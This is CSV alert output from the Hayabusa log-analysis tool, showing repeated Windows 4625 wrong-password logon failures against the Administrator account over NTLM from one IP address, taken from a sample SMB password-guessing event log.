2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MCFTP4gVGEKFKuRI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ALrDwJz2cta9fcXB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZZNXGw28osMQLjub  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4wQzvMnwYuEQRO7V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UloOAIgGuj6NecfR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cVSeLo2PRgGmf83Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SaCFO8CPFLuERugV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCwV1D4L5BDZSriK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QPhLQsM4R2ua4SxW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fwgp52JNi7xnTxpN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2GutBDenjweAluz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wflcgg5ebqu8hHGL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jXaaYSU2pakw6IsK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfJnBv3eA8wZttML  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kOXSI0jPfbvW4dAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8JW6aX5mNz7cETsl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NVuJLXJzlVnDLT4Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtSwhwnApnPI9AkO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1peOkjbd1WXGEAAM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Tbw3V9MtLIcxr65R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CEZ2v1f6t0luDj4D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R0omMppAFlFhE1mG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0jMvVN9eSeGW3zcN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnFNYabbO7IpbVku  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8KtyTTNdqVikZGYY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DCChjnFv2hMXXwgW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FvIYRZSomaJYJOH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FEirUFRscaOwTuAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RwQgMM9H1oN4te9Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JbGILYTcFwtYbDk1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5KzNsgWvyUhNEHd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KGvwbOtP3A5eDKCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YZvtNNX511hIleST  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lJBRTeW6OQtNrt5u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hovgq99STVt2GzrO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4kpT3gf0VCAVuVSa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tiB04AvkYp0PP3n1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PPluKgaiT10oC35V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8nCOM9uUeqv9QBx6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dSPrrNCh2FSWZKbI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aLDnCjr4pSdKAMX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G0UnmfB7lcXKEAvn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogjMSxcUw7cF5dMa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75uB8ejsSV5CbagM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5MMHLnyrzBQxluHn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5QXLn6fpmR52RBAz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KcdlrSUzcFNpaK5v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJjiRO5rJzZ8XtqP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ncBraDdG2htkHjXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lo9DNrL44Z2S2SYR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QKcFiKC5QiIoHtxy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sqvq9GwuPCO15lUV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XzgtJ3qUmkFiIY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1wc1Hjb4AK0Np1q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PKYNy0JyxIlFusMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IrcKp13ut9M0pCi0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B3lJSH0r8iHAVhPF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ju3lCbvbwvkIKsBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dQOHcZeAKQG6wHhC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QBPkgoKDLABqdSQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wqj4xOCsJg1j3IIh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XhBIu6wUPHc3DZAy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W0fI1GhH5YTOHbNN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7mLOWiojillZNYH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37dknpwsl8j1WRWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gzVum7a21sQe3fMt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JCFPSQmywelTXg74  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jCqb6TVV14hVX3NY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3qJsJrxVARedOdd3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s7iNkrkBNEbXPK0B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bio4zciNRolyeHc1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IFf1vN5MgAIsdZvx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zWhgUQSWAycVdYoS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
